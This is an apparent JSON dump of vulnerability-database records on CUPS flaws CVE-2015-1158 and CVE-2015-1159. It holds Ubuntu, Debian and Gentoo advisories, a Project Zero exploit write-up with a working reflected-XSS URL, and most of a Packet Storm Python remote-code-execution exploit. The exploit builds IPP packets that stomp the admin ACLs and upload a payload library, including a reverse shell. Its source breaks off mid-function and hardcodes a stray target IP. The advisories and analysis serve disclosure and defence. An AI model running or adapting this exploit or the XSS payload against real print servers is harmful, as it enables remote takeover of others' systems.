(CVE-2015-1158)\r\n\r\nIt was discovered that the CUPS templating engine contained a cross-site\r\nscripting issue. A remote attacker could use this issue to bypass default\r\nconfiguration settings. (CVE-2015-1159)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.04:\r\n cups 2.0.2-1ubuntu3.1\r\n\r\nUbuntu 14.10:\r\n cups 1.7.5-3ubuntu3.2\r\n\r\nUbuntu 14.04 LTS:\r\n cups 1.7.2-0ubuntu1.6\r\n\r\nUbuntu 12.04 LTS:\r\n cups 1.5.3-0ubuntu8.7\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2629-1\r\n CVE-2015-1158, CVE-2015-1159\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/cups/2.0.2-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/cups/1.7.5-3ubuntu3.2\r\n https://launchpad.net/ubuntu/+source/cups/1.7.2-0ubuntu1.6\r\n https://launchpad.net/ubuntu/+source/cups/1.5.3-0ubuntu8.7\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-06-14T00:00:00", "published": "2015-06-14T00:00:00", "id": "SECURITYVULNS:DOC:32208", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32208", "title": "[USN-2629-1] CUPS vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Code execution, cross-site scripting.", "edition": 1, "modified": "2015-06-14T00:00:00", "published": "2015-06-14T00:00:00", "id": "SECURITYVULNS:VULN:14537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14537", "title": "CUPS security vulnerabilities", "type": "securityvulns", "cvss": 
{"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-9679"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3172-1 security@debian.org\r\nhttp://www.debian.org/security/ Sebastien Delafond\r\nFebruary 25, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : cups\r\nCVE ID : CVE-2014-9679\r\nDebian Bug : 778387\r\n\r\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\r\nSystem, did not correctly parse compressed raster files. By submitting\r\na specially crafted raster file, a remote attacker could use this\r\nvulnerability to trigger a buffer overflow.\r\n\r\nFor the stable distribution (wheezy), this problem has been fixed in\r\nversion 1.5.3-5+deb7u5.\r\n\r\nFor the upcoming stable distribution (jessie) and unstable\r\ndistribution (sid), this problem has been fixed in version 1.7.5-11.\r\n\r\nWe recommend that you upgrade your cups packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n", 
"edition": 1, "modified": "2015-03-07T00:00:00", "published": "2015-03-07T00:00:00", "id": "SECURITYVULNS:DOC:31770", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31770", "title": "[SECURITY] [DSA 3172-1] cups security update", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9679"], "description": "Integer overflow on compressed raster files parsing.", "edition": 1, "modified": "2015-03-07T00:00:00", "published": "2015-03-07T00:00:00", "id": "SECURITYVULNS:VULN:14295", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14295", "title": "CUPS integer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "### Background\n\nCUPS, the Common Unix Printing System, is a full-featured print server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in cups. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-2.0.3\"", "edition": 1, "modified": "2015-10-31T00:00:00", "published": "2015-10-31T00:00:00", "id": "GLSA-201510-07", "href": "https://security.gentoo.org/glsa/201510-07", "type": "gentoo", "title": "CUPS: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "edition": 1, "description": "### Background\n\nCUPS, the Common Unix Printing System, is a full-featured print server.\n\n### Description\n\nA vulnerability has been discovered in CUPS concerning the handling of compressed raster files. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-2.0.2-r1\"", "modified": "2016-07-16T00:00:00", "published": "2016-07-16T00:00:00", "id": "GLSA-201607-06", "href": "https://security.gentoo.org/glsa/201607-06", "type": "gentoo", "title": "CUPS: Buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "description": "", "published": "2015-06-22T00:00:00", "type": "packetstorm", "title": "CUPS XSS / String Handling / Improper Teardown", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-22T00:00:00", "id": "PACKETSTORM:132389", "href": "https://packetstormsecurity.com/files/132389/CUPS-XSS-String-Handling-Improper-Teardown.html", "sourceData": "`Source: 
http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html \n \nAbstract \n \nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers. \n \nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation. \n \nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation. \n \nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same. \n \nSummary \n \nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. 
As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code. \n \nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. \n \nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations. \nBackground \n \nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158) \n \nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'. \n \nscheduler/ipp.c:1626: \n \n/* \n* Free old strings\u2026 \u2190 Even 'old' strings need to be freed. \n*/ \n \nfor (i = 0; i < attr->num_values; i ++) \n{ \n_cupsStrFree(attr->values[i].string.text); \nattr->values[i].string.text = NULL; \nif (attr->values[i].string.language) \u2190 for all values in an attribute \n{ \n_cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string \nattr->values[i].string.language = NULL; \n} \n} \n \nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request. 
\n \nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times. \n \nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations. \n \nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build. \n \n \nA Reflected XSS in the Web Interface (CVE-2015-1159) \n \nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'. \n \nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting. \n \nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters: \n<>\"'& \n \nThese are replaced with their HTML entity equivalents ('<' etc...). \n \nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650: \n \nif (*s == '<') \n{ \n/* \n* Pass <A HREF=\"url\"> and </A>, otherwise quote it... \n*/ \n \nif (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9)) \n{ \nfputs(\"<A HREF=\\\"\", out); \ns += 9; \n \nwhile (*s && *s != '\\\"') \n{ \nif (*s == '&') \nfputs(\"&\", out); \nelse \nputc(*s, out); \n \ns ++; \n} \n \nif (*s) \ns ++; \n \nfputs(\"\\\">\", out); \n} \n \nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. 
The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context. \n \nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue. \n \nTake this example from templates/help-header.tmp:19: \n \n<P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P> \n \nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags. \n \nRequesting the following URI will demonstrate this reflected XSS: \nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search \n \nThe 'QUERY' parameter is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield an HTML page that parses without errors. 
\n \n \nUpstream Fixes \n \nApple Fix (April 16, 2015): \nhttps://support.apple.com/kb/DL1807 \n \nOfficial CUPS fix for downstream vendors (June 8, 2015): \nhttps://www.cups.org/str.php?L4609 \nhttp://www.cups.org/blog.php?L1082+I0+Q \n \nProject Zero Bug \n \nFor those interested, the sample exploit can be found here: \n \nhttps://code.google.com/p/google-security-research/issues/detail?id=455 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz \n \nDisclosure Timeline \n \nMarch 20th, 2015 - Initial notification to Apple \nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3 \nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3 \nJune 18th, 2015 - Disclosure + 90 days \nJune 19th, 2015 - P0 publication \n \nAttack Surface Reduction in CUPS 2.0.3+ \n \nCUPS 2.0.3 and 2.1 beta contain several prescient implementation changes to limit the risk and impact of future similar bugs: \n \nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead. \nLD_* and DYLD_* environment variables are blocked when CUPS is running as root. \nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only). \n \nAcknowledgements \n \nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits. \n \nConclusion \n \nNo one prints anything anymore anyways. 
\n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132389/cups-xss.txt"}, {"lastseen": "2017-02-03T17:04:32", "description": "", "published": "2017-02-03T00:00:00", "type": "packetstorm", "title": "CUPS Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "id": "PACKETSTORM:140920", "href": "https://packetstormsecurity.com/files/140920/CUPS-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution \n# Google Dork: n/a \n# Date: 2/2/17 \n# Exploit Author: @0x00string \n# Vendor Homepage: cups.org \n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2 \n# Version: <2.0.3 \n# Tested on: Ubuntu 14/15 \n# CVE : CVE-2015-1158 \nimport os, re, socket, random, time, getopt, sys \nfrom socket import * \nfrom struct import * \n \ndef banner(): \nprint ''' \nlol ty google \n0000000000000 \n0000000000000000000 00 \n00000000000000000000000000000 \n0000000000000000000000000000000 \n000000000 0000000000 \n00000000 0000000000 \n0000000 000000000000 \n0000000 000000000000000 \n000000 000000000 000000 \n0000000 000000000 000000 \n000000 000000000 000000 \n000000 000000000 000000 \n000000 00000000 000000 \n000000 000000000 000000 \n0000000 000000000 0000000 \n000000 000000000 000000 \n0000000000000000 0000000 \n0000000000000 0000000 \n00000000000 00000000 \n00000000000 000000000 \n0000000000000000000000000000000 \n00000000000000000000000000000 \n000 0000000000000000000 \n0000000000000 \n@0x00string \ngithub.com/0x00string/oldays/CVE-2015-1158.py \n''' \n \ndef usage (): \nprint (\"python script.py <args>\\n\" \n\" -h, --help: Show this message\\n\" \n\" -a, --rhost: Target IP address\\n\" \n\" -b, --rport: Target IPP service port\\n\" \n\" -c, --lib /path/to/payload.so\\n\" \n\" -f, --stomp-only 
Only stomp the ACL (no postex)\\n\" \n\"\\n\" \n\"Examples:\\n\" \n\"python script.py -a 10.10.10.10 -b 631 -f\\n\" \n\"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\") \nexit() \n \ndef pretty (t, m): \nif (t is \"+\"): \nprint \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"-\"): \nprint \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"*\"): \nprint \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\", \nelif (t is \"!\"): \nprint \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\", \n \ndef createDump (input): \nd, b, h = '', [], [] \nu = list(input) \nfor e in u: \nh.append(e.encode(\"hex\")) \nif e == '0x0': \nb.append('0') \nelif 30 > ord(e) or ord(e) > 128: \nb.append('.') \nelif 30 < ord(e) or ord(e) < 128: \nb.append(e) \n \ni = 0 \nwhile i < len(h): \nif (len(h) - i ) >= 16: \nd += ' '.join(h[i:i+16]) \nd += \" \" \nd += ' '.join(b[i:i+16]) \nd += \"\\n\" \ni = i + 16 \nelse: \nd += ' '.join(h[i:(len(h) - 0 )]) \npad = len(' '.join(h[i:(len(h) - 0 )])) \nd += ' ' * (56 - pad) \nd += ' '.join(b[i:(len(h) - 0 )]) \nd += \"\\n\" \ni = i + len(h) \n \nreturn d \n \nclass tcpsock: \ndef __init__(self, sock=None): \nif sock is None: \nself.sock = socket( \nAF_INET, SOCK_STREAM) \nself.sock.settimeout(30) \nelse: \nself.sock = sock \ndef connect(self, host, port): \nself.sock.connect((host, int(port))) \ndef tx(self, msg): \nself.sock.send(msg) \ndef rx(self): \ntmp = self.sock.recv(1024) \nmsg = \"\" \nwhile tmp: \nmsg += tmp \ntmp = self.sock.recv(1024) \nreturn msg \n \ndef txrx (ip, port, proto, txpacket): \nif (proto is \"tcp\"): \nsock = tcpsock() \nelif (proto is \"udp\"): \nsock = udpsock() \nelse: \nreturn None \nsock.connect(ip, port) \nsock.tx(txpacket) \nrxpacket = sock.rx() \nreturn rxpacket \n \ndef locatePrinters(rhost, rport=\"631\"): \nrequest = ( \"GET /printers HTTP/1.1\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" 
\n\"\\x0d\\x0a\") \nresponse = txrx(rhost, int(rport), \"tcp\", request) \nif response is not None: \nm = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response) \nif m is not None: \nprinter = m.group(1) \npretty(\"+\",\"printer found: \" + printer) \nelse: \npretty(\"-\",\"no printers\") \nexit(1) \nreturn printer \n \ndef preparePayload(libpath): \nwith open(libpath, 'rb') as f: \npayload = f.read() \nif payload is not None: \npretty(\"*\",\"Payload:\\n\" + createDump(payload)) \nelse: \npretty(\"-\",\"something went wrong\") \nusage() \nreturn payload \n \ndef seedTarget(rhost, rport, printer, payload): \ni = random.randint(1,3) \nreqid = str(pack(\">i\",(i+2))) \nreqid2 = str(pack(\">i\",(i+3))) \nprinter_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer \n \ncreate_job_packet = (\"\\x02\\x00\" \n\"\\x00\\x05\"+ \nreqid+ \n\"\\x01\" \n\"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\" \n\"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\" \n\"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri + \n\"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\" \n\"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\" \n\"\\x02\" \n\"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\" \n\"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\" \n\"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\" \n\"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\" \n\"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\" \n\"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\" \n\"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\" \n\"\\x03\") \npretty(\"*\",\"Sending createJob\") \n \nhttp_header1 = ( \"POST \" + 
printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \ncreateJobRequest = http_header1 + create_job_packet \nblah = txrx(rhost,int(rport),\"tcp\",createJobRequest) \nif blah is not None: \nm = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah) \nif m is not None: \njobid = m.group(1) \nelse: \npretty(\"-\",\"something went wrong\"); \nexit() \n \npretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\") \npretty(\"*\", \"Sending sendJob\") \n \nsend_document_packet = (\"\\x02\\x00\" \n\"\\x00\\x06\"+ \nreqid2+ \n\"\\x01\" \n\"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\" \n\"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\" \n\"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri + \n\"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) + \n\"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\" \n\"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\" \n\"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\" \n\"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\" \n\"\\x03\"+ \npayload) \n \nhttp_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" \n\"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\" \n\"\\x0d\\x0a\") \n \nsendJobRequest = http_header2 + send_document_packet \nblah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest) \npretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\") 
\npretty(\"*\",\"job id: \" + jobid) \nreturn jobid \n \ndef stompACL(rhost, rport, printer): \ni = random.randint(1,1024) \nprinter_url = \"ipp://\" + rhost + \":\" + rport + printer \n \nadmin_stomp = (\"\\x02\\x00\" # vers 2.0 \n\"\\x00\\x05\"+ # op id: Create Job (0x0005) \nstr(pack(\">i\",(i+1)))+ \n\"\\x01\" # op attributes marker \n\"\\x47\" # charset \n\"\\x00\\x12\" # name len: 18 \n\"attributes-charset\" \n\"\\x00\\x08\" # val len: 8 \n\"us-ascii\" \n\"\\x48\" # natural language \n\"\\x00\\x1b\" # name len: 27 \n\"attributes-natural-language\" \n\"\\x00\\x06\" # val len: 6 \n\"/admin\" \n\"\\x45\" # printer-uri \n\"\\x00\\x0b\" # name len 11 \n\"printer-uri\" + \nstr(pack(\">h\", len(printer_url))) + printer_url + \n\"\\x42\" # name without lang \n\"\\x00\\x14\" # name len: 20 \n\"requesting-user-name\" \n\"\\x00\\x06\" # val len: 6 \n\"/admin\" \n\"\\x02\" # job attrs marker \n\"\\x21\" # integer \n\"\\x00\\x06\" # name len: 6 \n\"copies\" \n\"\\x00\\x04\" # val len: 4 \n\"\\x00\\x00\\x00\\x01\" # 1 \n\"\\x42\" # name w/o lang \n\"\\x00\\x19\" # name len: 25 \n\"job-originating-host-name\" \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol 
\n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x36\" # nwl \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x16\" # val len: 22 \n\"\\x00\\x06\" # length \n\"/admin\" \n\"\\x00\\x0c\" \n\"BBBBBBBBBBBB\" \n\"\\x03\") # end of attributes \n \nconf_stomp = (\"\\x02\\x00\" # vers 2.0 \n\"\\x00\\x05\"+ # op id: Create Job (0x0005) \nstr(pack(\">i\",(i+2)))+ \n\"\\x01\" # op attributes marker \n\"\\x47\" # charset \n\"\\x00\\x12\" # name len: 18 \n\"attributes-charset\" \n\"\\x00\\x08\" # val len: 8 \n\"us-ascii\" \n\"\\x48\" # natural language \n\"\\x00\\x1b\" # name len: 27 \n\"attributes-natural-language\" \n\"\\x00\\x0b\" # val len: 11 \n\"/admin/conf\" \n\"\\x45\" # printer-uri \n\"\\x00\\x0b\" # name len 11 \n\"printer-uri\" + \nstr(pack(\">h\", len(printer_url))) + printer_url + \n\"\\x42\" # name without lang \n\"\\x00\\x14\" # name len: 20 \n\"requesting-user-name\" \n\"\\x00\\x0b\" # val len: 11 \n\"/admin/conf\" \n\"\\x02\" # job attrs marker \n\"\\x21\" # integer \n\"\\x00\\x06\" # name len: 6 \n\"copies\" \n\"\\x00\\x04\" # val len: 4 \n\"\\x00\\x00\\x00\\x01\" # 1 \n\"\\x42\" # name w/o lang \n\"\\x00\\x19\" # name len: 25 \n\"job-originating-host-name\" \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" 
# name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x42\" # nwol \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x0c\" # val len: 12 \n\"AAAAAAAAAAAA\" \n\"\\x36\" # nwl \n\"\\x00\\x00\" # name len: 0 \n\"\\x00\\x1b\" # val len: 27 \n\"\\x00\\x0b\" # length \n\"/admin/conf\" \n\"\\x00\\x0c\" \n\"BBBBBBBBBBBB\" \n\"\\x03\") # end of attributes \n \nhttp_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\" \n\"Content-Type: application/ipp\\x0d\\x0a\" \n\"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\" \n\"User-Agent: CUPS/2.0.2\\x0d\\x0a\" \n\"Connection: Close\\x0d\\x0a\" 